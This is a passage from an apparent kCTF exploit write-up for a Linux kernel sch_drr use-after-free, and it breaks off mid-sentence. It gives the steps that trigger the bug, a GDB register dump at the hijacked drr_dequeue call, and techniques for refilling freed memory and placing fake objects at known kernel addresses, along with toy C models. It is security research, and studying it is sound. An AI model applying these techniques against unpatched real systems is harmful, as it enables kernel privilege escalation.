[   26.103384]  ? __virt_addr_valid+0xc7/0x140
[   26.104294]  ? __list_del_entry_valid+0x7a/0x140
[   26.105306]  kasan_report+0xb6/0xf0
[   26.106059]  ? __list_del_entry_valid+0x7a/0x140
[   26.107056]  __list_del_entry_valid+0x7a/0x140
[   26.108001]  drr_qlen_notify+0x60/0xd0
[   26.108812]  qdisc_tree_reduce_backlog+0xf6/0x1f0
[   26.109827]  drr_delete_class+0x16e/0x2a0
</span></code></pre></div></div>

<p>We finally have a UAF and it happens when you go to delete class 1:1. So the PoC was entirely correct the whole time, and it was my bad kernel config and my assumptions about what must be happening (an impossible UAF on the qdisc) that led me astray for so long. As you can see from the backtrace, we know this code path well. This is the exact code path that leads to the initial list del bug we encountered when we were deleting class 1:3.</p>

<p>So now everything clicked for me. When we delete class 1:1, it tries to unlink its <code class="language-plaintext highlighter-rouge">alist</code> <code class="language-plaintext highlighter-rouge">list_head</code> from the drr scheduler’s <code class="language-plaintext highlighter-rouge">active</code> list, and when it does its <code class="language-plaintext highlighter-rouge">list_del</code> sanity checks, it accesses the freed 1:3 class’s <code class="language-plaintext highlighter-rouge">list_head</code>, which remains in the <code class="language-plaintext highlighter-rouge">active</code> list even though we destroyed class 1:3. This is because we never removed it from the active list; the <code class="language-plaintext highlighter-rouge">list_del</code> we attempted tried to unlink class 3:1’s <code class="language-plaintext highlighter-rouge">list_head</code> instead. So this is where the UAF access comes from.</p>
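<p>The stale entry can be modelled in userspace as well. This is only a sketch under stated assumptions: <code class="language-plaintext highlighter-rouge">toy_class</code>, its <code class="language-plaintext highlighter-rouge">freed</code> marker, and <code class="language-plaintext highlighter-rouge">freed_neighbours_touched</code> are hypothetical, and nothing is actually freed, so the demo never touches invalid memory. It counts how many “freed” classes the unlink sanity checks for class 1:1 would have to read.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct list_head {
	struct list_head *next, *prev;
};

/* Toy class: "freed" stands in for kfree(); nothing is really released. */
struct toy_class {
	struct list_head alist;
	bool freed;
};

/* Recover the toy_class that embeds a given alist node. */
#define toy_class_of(ptr) \
	((const struct toy_class *)((const char *)(ptr) - \
				    offsetof(struct toy_class, alist)))

static void list_init(struct list_head *h)
{
	h->next = h;
	h->prev = h;
}

static void list_add_tail(struct list_head *n, struct list_head *head)
{
	n->prev = head->prev;
	n->next = head;
	head->prev->next = n;
	head->prev = n;
}

/* The unlink sanity checks read victim->prev->next and victim->next->prev.
 * Count how many of those neighbours are classes marked as freed. */
static int freed_neighbours_touched(const struct list_head *head,
				    const struct toy_class *victim)
{
	const struct list_head *prev = victim->alist.prev;
	const struct list_head *next = victim->alist.next;
	int n = 0;

	if (prev != head && toy_class_of(prev)->freed)
		n++;
	if (next != head && next != prev && toy_class_of(next)->freed)
		n++;
	return n;
}

static int demo_stale_active_entry(void)
{
	struct list_head active;
	struct toy_class c11 = { { NULL, NULL }, false };
	struct toy_class c13 = { { NULL, NULL }, false };

	list_init(&active);
	list_add_tail(&c11.alist, &active);
	list_add_tail(&c13.alist, &active);

	/* Deleting 1:3 unlinked the wrong class, so 1:3 stays on the
	 * active list, and then the class itself is released. */
	c13.freed = true;

	/* Now delete 1:1: its checks must read its neighbour, 1:3. */
	assert(c11.alist.next == &c13.alist);
	return freed_neighbours_touched(&active, &c11);
}
```

<p>In this model, deleting class 1:1 touches exactly one freed neighbour, which is the access KASAN complains about in the report above.</p>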

<p>So now we can reason about how to exploit the UAF. From here, I created a similar PoC in my exploit just to make sure I had the right constituent parts, but I was able to reduce the complexity a bit because, in hindsight, the bug is quite simple once you understand all of the moving parts. There are aspects of my exploit setup that are not strictly required, but keeping it relatively close to the PoC helped me initially and then I just left the code in there.</p>

<p>Here are the steps I followed to trigger the bug:</p>
<ol>
  <li>Create a root qdisc for the loopback interface that is of type drr</li>
  <li>Create class 1:1 of type drr</li>
  <li>Create class 1:3 of type drr</li>
  <li>Assign a plug qdisc to class 1:1</li>
  <li>Assign a pfifo (default type) qdisc to 1:3, this will be our reparented buggy qdisc later</li>
  <li>Create class 1:2 of type drr and reparent 1:3’s qdisc to 1:2, triggering the bug</li>
  <li>Enqueue packets in 1:1 and 1:2, this will place 1:1 and 1:2 class <code class="language-plaintext highlighter-rouge">alist</code> <code class="language-plaintext highlighter-rouge">list_head</code> nodes in the scheduler’s active list</li>
  <li>Delete class 1:1, I do this first because it will require sane <code class="language-plaintext highlighter-rouge">list_head</code> values for class 1:2 when it removes itself from the active list</li>
  <li>Delete class 1:2, this will fail to remove 1:2’s <code class="language-plaintext highlighter-rouge">list_head</code> from the active list but will free the class</li>
  <li>?? Profit</li>
</ol>

<p>So now we have to find out how the active list is used so that we can see how we can access our freed class that has a reference cached in the active list. A quick grep for <code class="language-plaintext highlighter-rouge">active</code> in <code class="language-plaintext highlighter-rouge">sch_drr.c</code> will lead you to <code class="language-plaintext highlighter-rouge">drr_dequeue</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">drr_dequeue</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">))</span>	<span class="c1">// [1]</span>
		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">cl</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">,</span> <span class="k">struct</span> <span class="n">drr_class</span><span class="p">,</span> <span class="n">alist</span><span class="p">);</span> <span class="c1">// [2]</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">peek</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span> <span class="c1">// [3]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">qdisc_warn_nonwc</span><span class="p">(</span><span class="n">__func__</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&lt;=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>
			<span class="n">skb</span> <span class="o">=</span> <span class="n">qdisc_dequeue_peeked</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">))</span>
				<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>

			<span class="n">bstats_update</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">bstats</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_bstats_update</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
			<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">+=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
		<span class="n">list_move_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>
	<span class="p">}</span>
<span class="nl">out:</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: This function gets invoked whenever a packet is sent through the root drr qdisc’s interface. The way the drr algorithm works is that it looks through its active packet flows and tries to dequeue packets based on the requirements of each active class. It first checks to make sure there are actually active classes on the scheduler’s active list. Thankfully, our buggy class is still on the active list because class 1:1, by virtue of its plug qdisc, made sure that no packets were dequeued. So tip of the cap to the patch author and Lion Ackermann, thank you!</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: In a while loop, we first get a handle to the first <code class="language-plaintext highlighter-rouge">struct drr_class</code> on the active list. Since we first deleted class 1:1, which had packets enqueued in its plug qdisc, this first class should be our UAF class</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: This is what caught my eye. Since we have a UAF on <code class="language-plaintext highlighter-rouge">cl</code>, we can potentially hijack RIP here, because we may control the entirety of <code class="language-plaintext highlighter-rouge">cl-&gt;qdisc-&gt;ops-&gt;peek()</code> and replace <code class="language-plaintext highlighter-rouge">peek()</code> with a function of our choice</p>
  </li>
</ul>
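<p>The idea behind <code class="language-plaintext highlighter-rouge">[3]</code> can be sketched in plain userspace C. The <code class="language-plaintext highlighter-rouge">toy_*</code> structs below are hypothetical and far smaller than the real kernel structures; they only keep the pointer chain that the indirect call walks. Overwriting <code class="language-plaintext highlighter-rouge">cl.qdisc</code> is a stand-in for refilling the freed class with data we control.</p>

```c
#include <assert.h>
#include <stddef.h>

struct toy_qdisc;

/* Only the members the call chain touches are modelled. */
struct toy_qdisc_ops {
	int (*peek)(struct toy_qdisc *q);
};

struct toy_qdisc {
	const struct toy_qdisc_ops *ops;
};

struct toy_class {
	struct toy_qdisc *qdisc;
};

static int legit_peek(struct toy_qdisc *q)
{
	(void)q;
	return 0;
}

static int attacker_target(struct toy_qdisc *q)
{
	(void)q;
	return 0x41;
}

/* Same shape as the indirect call in drr_dequeue. */
static int dispatch_peek(struct toy_class *cl)
{
	return cl->qdisc->ops->peek(cl->qdisc);
}

static int demo_refilled_class(void)
{
	static const struct toy_qdisc_ops real_ops = { .peek = legit_peek };
	static const struct toy_qdisc_ops fake_ops = { .peek = attacker_target };
	struct toy_qdisc real_q = { .ops = &real_ops };
	struct toy_qdisc fake_q = { .ops = &fake_ops };
	struct toy_class cl = { .qdisc = &real_q };

	/* Before the refill, the intended function runs. */
	assert(dispatch_peek(&cl) == 0);

	/* Stand-in for the refill: whoever controls the class memory
	 * controls the qdisc pointer, and through it the call target. */
	cl.qdisc = &fake_q;
	return dispatch_peek(&cl);
}
```

<p>Note that controlling the class alone is not enough: the fake qdisc and the fake ops table also have to live somewhere the class can point to.</p>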

<p>Now it was time to develop an exploit plan.</p>

<h2 id="exploit-plan">Exploit Plan</h2>
<p>Seeing that we invoke <code class="language-plaintext highlighter-rouge">cl-&gt;qdisc-&gt;ops-&gt;peek()</code>, I was confident that I could hijack execution. This turned out to be entirely true. At this point I told some friends that all I had to do was some ROP and I’d be on my way to capturing the flag. This turned out to be entirely false, and completing the exploit was a lot more difficult than I anticipated. The main issue I had trying to ROP was that I couldn’t find a stack-pivot gadget that worked with the register control we have at the time we hijack execution, so we couldn’t start ROP’ing:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span>rax   : 0xffffffff81356310					// <span class="o">[</span>1]
<span class="gp">$</span>rbx   : 0xffff88800f295bd0					// <span class="o">[</span>2]
<span class="gp">$</span>rcx   : 0x20000           
<span class="gp">$</span>rdx   : 0x0               
<span class="gp">$</span>rsp   : 0xffffc9000188baf0
<span class="gp">$</span>rbp   : 0xffff888006d19e00
<span class="gp">$</span>rsi   : 0x0               
<span class="gp">$</span>rdi   : 0xffffffff84267b88					// <span class="o">[</span>3]
<span class="gp">$</span>rip   : 0xffffffff81d71bd8
<span class="gp">$</span>r8    : 0x1               
<span class="gp">$</span>r9    : 0xffffc9000188bb90
<span class="gp">$</span>r10   : 0xffff88800f2719e0
<span class="gp">$</span>r11   : 0xffff888006b6a660
<span class="gp">$</span>r12   : 0xffff888006d19f40
<span class="gp">$</span>r13   : 0x0               
<span class="gp">$</span>r14   : 0xffff888006d19e00
<span class="gp">$</span>r15   : 0xffff888006d19e00
<span class="gp">$</span>eflags: <span class="o">[</span>zero CARRY parity adjust SIGN <span class="nb">trap </span>INTERRUPT direction overflow resume virtualx86 identification]
<span class="gp">$</span>cs: 0x10 <span class="nv">$ss</span>: 0x18 <span class="nv">$ds</span>: 0x00 <span class="nv">$es</span>: 0x00 <span class="nv">$fs</span>: 0x00 <span class="nv">$gs</span>: 0x00 
<span class="go">───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
</span><span class="gp">   0xffffffff81d71bcc &lt;drr_dequeue+44&gt;</span><span class="w"> </span>mov    rdi, QWORD PTR <span class="o">[</span>rbx+0x10]
<span class="gp">   0xffffffff81d71bd0 &lt;drr_dequeue+48&gt;</span><span class="w"> </span>mov    rax, QWORD PTR <span class="o">[</span>rdi+0x18]
<span class="gp">   0xffffffff81d71bd4 &lt;drr_dequeue+52&gt;</span><span class="w"> </span>mov    rax, QWORD PTR <span class="o">[</span>rax+0x38]
<span class="gp"> → 0xffffffff81d71bd8 &lt;drr_dequeue+56&gt;</span><span class="w"> </span>call   rax
</code></pre></div></div>

<p>Here I’m showing you the GDB output when we’re about to <code class="language-plaintext highlighter-rouge">call rax</code>, which is when we call the <code class="language-plaintext highlighter-rouge">peek</code> that we hijack. We have the following register control:</p>
<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: <code class="language-plaintext highlighter-rouge">rax</code> ends up being the function address we want to call, so any ROP stack pivot that utilizes <code class="language-plaintext highlighter-rouge">rax</code> would be self-referential in a way that made it difficult to find an appropriate gadget</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: <code class="language-plaintext highlighter-rouge">rbx</code> ends up being an address inside our UAF class. This is great for us as this could represent a way to stack-pivot since we control the contents around this address; however, I was unable to find any stack pivot gadgets that help us here</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: <code class="language-plaintext highlighter-rouge">rdi</code> ends up being the address of the UAF class’s qdisc. Again, this would be great for us because we control this memory, but I was unable to find an appropriate stack pivot gadget</p>
  </li>
</ul>
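<p>As a sanity check on the layout, the three loads before <code class="language-plaintext highlighter-rouge">call rax</code> can be replayed over plain byte buffers. This is a userspace sketch, not exploit code: the offsets <code class="language-plaintext highlighter-rouge">0x10</code>, <code class="language-plaintext highlighter-rouge">0x18</code>, and <code class="language-plaintext highlighter-rouge">0x38</code> are read off the disassembly above, while the buffer sizes and the names <code class="language-plaintext highlighter-rouge">resolve_call_target</code> and <code class="language-plaintext highlighter-rouge">demo_fake_chain</code> are hypothetical.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Offsets taken from the disassembly shown above. */
#define OFF_QDISC_FROM_RBX 0x10 /* mov rdi, [rbx+0x10] */
#define OFF_OPS_IN_QDISC   0x18 /* mov rax, [rdi+0x18] */
#define OFF_PEEK_IN_OPS    0x38 /* mov rax, [rax+0x38] */

static uintptr_t load_ptr(uintptr_t addr)
{
	uintptr_t v;

	memcpy(&v, (const void *)addr, sizeof(v));
	return v;
}

static void store_ptr(unsigned char *dst, uintptr_t v)
{
	memcpy(dst, &v, sizeof(v));
}

/* Replays the three loads that precede `call rax`. */
static uintptr_t resolve_call_target(uintptr_t rbx)
{
	uintptr_t rdi = load_ptr(rbx + OFF_QDISC_FROM_RBX);
	uintptr_t rax = load_ptr(rdi + OFF_OPS_IN_QDISC);

	return load_ptr(rax + OFF_PEEK_IN_OPS);
}

/* Builds a fake class -> qdisc -> ops chain and returns the value that
 * would end up in rax. Buffer sizes are arbitrary for this sketch. */
static uintptr_t demo_fake_chain(uintptr_t target)
{
	static unsigned char fake_class[0x40];
	static unsigned char fake_qdisc[0x40];
	static unsigned char fake_ops[0x40];

	assert(sizeof(fake_ops) >= OFF_PEEK_IN_OPS + sizeof(uintptr_t));

	store_ptr(fake_ops + OFF_PEEK_IN_OPS, target);
	store_ptr(fake_qdisc + OFF_OPS_IN_QDISC, (uintptr_t)fake_ops);
	store_ptr(fake_class + OFF_QDISC_FROM_RBX, (uintptr_t)fake_qdisc);

	return resolve_call_target((uintptr_t)fake_class);
}
```

<p>Whatever value is written into the fake ops table is the value that comes back out, which is why <code class="language-plaintext highlighter-rouge">rax</code> is fully ours at the call site while <code class="language-plaintext highlighter-rouge">rbx</code> and <code class="language-plaintext highlighter-rouge">rdi</code> point into memory whose contents we control.</p>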

<p>To be quite honest, I didn’t spend too much time trying to make ROP work. There were perhaps gadgets or strategies that I didn’t think of or consider that would’ve enabled me to use ROP, but I gave up pretty quickly, after probably a couple of hours of looking. With our precise control over <code class="language-plaintext highlighter-rouge">rdi</code> and the fact that we have what amounts to an arbitrary function call primitive, I felt like there <em>had</em> to be gadgets (single function calls) we could leverage to capture the flag.</p>

<p>First things first: I knew from other entries and players that I didn’t really have to worry about KASLR as a barrier, because I could always just use the <a href="https://www.willsroot.io/2022/12/entrybleed.html">Entrybleed</a> side-channel, so I didn’t invest any time in trying to think of other ways to defeat KASLR. There was also the possibility of using the <code class="language-plaintext highlighter-rouge">WARN()</code> splat from the invalid <code class="language-plaintext highlighter-rouge">list_del</code>, which ends up showing us register values containing heap pointers, our PID (on COS instances we spawn inside a namespace jail and we don’t know our real pid), and a kernel text pointer that could be used to defeat KASLR. I thought this was sort of inelegant but never crossed it off my list of possibilities. Luckily I was able to complete the exploit without resorting to this.</p>

<p>With that settled, I moved on to what we should do to refill the freed class so that we could control what function is called. Back in around 2023, I identified the <a href="https://elixir.bootlin.com/linux/v5.15.173/source/include/net/netfilter/nf_tables.h#L1178"><code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code></a> field as a nice elastic object that is 100% user-controlled and could be used as a refill object for kmalloc slab caches up to kmalloc-256, but I never got the chance to use it. Kernel devs eventually turned this allocation into a <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> allocation, so when accounted and non-accounted slab caches are kept separate, it can no longer be used to replace general kmalloc-128 objects like our class. But on the Google COS instance, which runs a 5.15.173+ kernel, the allocation was non-accounted, so I decided to use it.</p>

<p>With this refill object, we can now fake 100% of the UAF class, which is obviously helpful. The problem is that due to the multiple pointer dereferences in the indirect call to <code class="language-plaintext highlighter-rouge">cl-&gt;qdisc-&gt;ops-&gt;peek</code>, we also need to control data at a <em>known</em> location relative to the kernel base. I first looked for an opportunity to use <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">RetSpill</a> to smuggle user-controlled values onto my kernel stack, but we end up in our gadget via a <code class="language-plaintext highlighter-rouge">sendto</code> syscall, which unfortunately doesn’t happen to spill any user values onto the kernel stack, at least from what I could tell. Next I settled on using the <a href="https://elixir.bootlin.com/linux/v5.15.173/source/fs/kernfs/dir.c#L30"><code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code></a>, which I learned about in the kCTF Discord from <a href="https://x.com/roddux">@roddux</a>. They had read this <a href="https://github.com/zerozenxlabs/ZDI-24-020">writeup</a>, which contained the details. Basically, if your kernel has <code class="language-plaintext highlighter-rouge">CONFIG_NETFILTER_XT_MATCH_CGROUP</code>, which kCTF instances do, then you can store up to <code class="language-plaintext highlighter-rouge">PATH_MAX</code> bytes of user-controlled data at a known offset from the kernel base. This is insane actually and makes exploitation so much easier. The best part is that the data there is very mutable; you can just keep resetting its contents. You can accomplish this by establishing an <code class="language-plaintext highlighter-rouge">iptables</code> match rule on a cgroup file path, and the file path gets stored as data in the buffer. The only <em>catch</em> is that the buffer is meant to store a path name, so any NUL byte would terminate your data buffer. So this is something I had to account for in my exploit.</p>
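<p>Because the buffer holds a path name, it helps to check up front which values can be written into it as-is. The helpers below are a small sketch of that check, not code from my exploit: <code class="language-plaintext highlighter-rouge">first_nul_offset</code> and <code class="language-plaintext highlighter-rouge">qword_is_path_safe</code> are hypothetical names, and the only assumption is that a zero byte anywhere in the payload ends the stored data.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offset of the first NUL byte in buf[0..len), or len if there is none. */
static size_t first_nul_offset(const unsigned char *buf, size_t len)
{
	const unsigned char *p = memchr(buf, 0, len);

	return p ? (size_t)(p - buf) : len;
}

/* True if none of the eight bytes of the value is zero, i.e. the value
 * could sit inside a NUL-terminated string without truncating it. */
static bool qword_is_path_safe(uint64_t v)
{
	unsigned char bytes[sizeof(v)];

	memcpy(bytes, &v, sizeof(v));
	return first_nul_offset(bytes, sizeof(bytes)) == sizeof(bytes);
}

/* Number of leading payload bytes that would survive being stored as a
 * path: everything up to, but not including, the first NUL byte. */
static size_t path_safe_prefix_len(const unsigned char *payload, size_t len)
{
	assert(payload != NULL || len == 0);
	return first_nul_offset(payload, len);
}
```

<p>For example, a text pointer like <code class="language-plaintext highlighter-rouge">0xffffffff81356310</code> from the register dump above contains no zero bytes and passes the check, while a heap pointer like <code class="language-plaintext highlighter-rouge">0xffff888006d19e00</code> or a small constant like <code class="language-plaintext highlighter-rouge">0x20000</code> does not, so values like those need to be avoided or worked around.</p>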

<p>Now we seemingly had everything we needed to explore what function to call. We had our fake class which was in <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> and our fake qdisc and its ops table at a known address in <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code>. The next thing I wanted to accomplish at this point was to determine what side-effects hijacking execution here brought with it. So I used our function call primitive to just call a <code class="language-plaintext highlighter-rouge">ret</code> gadget, and see where we end up. We immediately blow up in <code class="language-plaintext highlighter-rouge">drr_dequeue</code> for a few reasons:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">drr_dequeue</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">))</span>
		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">cl</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">,</span> <span class="k">struct</span> <span class="n">drr_class</span><span class="p">,</span> <span class="n">alist</span><span class="p">);</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">peek</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>				<span class="c1">// [1]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">qdisc_warn_nonwc</span><span class="p">(</span><span class="n">__func__</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>					<span class="c1">// [2]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&lt;=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span><span class="p">)</span> <span class="p">{</span>					<span class="c1">// [3]</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>					<span class="c1">// [4]</span>
			<span class="n">skb</span> <span class="o">=</span> <span class="n">qdisc_dequeue_peeked</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>			<span class="c1">// [5]</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">))</span>
				<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>					<span class="c1">// [6]</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>

			<span class="n">bstats_update</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">bstats</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_bstats_update</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
			<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>						<span class="c1">// [7]</span>
		<span class="p">}</span>

		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">+=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
		<span class="n">list_move_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>				<span class="c1">// [8]</span>
	<span class="p">}</span>
<span class="nl">out:</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Once we call our simple <code class="language-plaintext highlighter-rouge">ret</code> gadget during our experiment, we return to <code class="language-plaintext highlighter-rouge">[1]</code>, where the return value is interpreted as a pointer to a <code class="language-plaintext highlighter-rouge">sk_buff</code>. This could be a problem for us because whatever gadget we use could do something with <code class="language-plaintext highlighter-rouge">rax</code>, which is where the return value is supposed to be stored. In our experiment, our function doesn’t touch <code class="language-plaintext highlighter-rouge">rax</code>, we just return, so <code class="language-plaintext highlighter-rouge">rax</code> still points to a function address. So it definitely isn’t NULL. Since it’s not NULL, we progress to <code class="language-plaintext highlighter-rouge">[2]</code>. This ends up being something like a read of an <code class="language-plaintext highlighter-rouge">skb</code> field value, like <code class="language-plaintext highlighter-rouge">skb-&gt;len</code>, so in our case it returns a value read from executable text, because <code class="language-plaintext highlighter-rouge">rax</code> is a function address. At <code class="language-plaintext highlighter-rouge">[3]</code> we see that if the value read from the kernel text is less than or equal to our fake class deficit value, we enter the if statement body at <code class="language-plaintext highlighter-rouge">[4]</code>. Here, we are actually decrementing a value in our fake 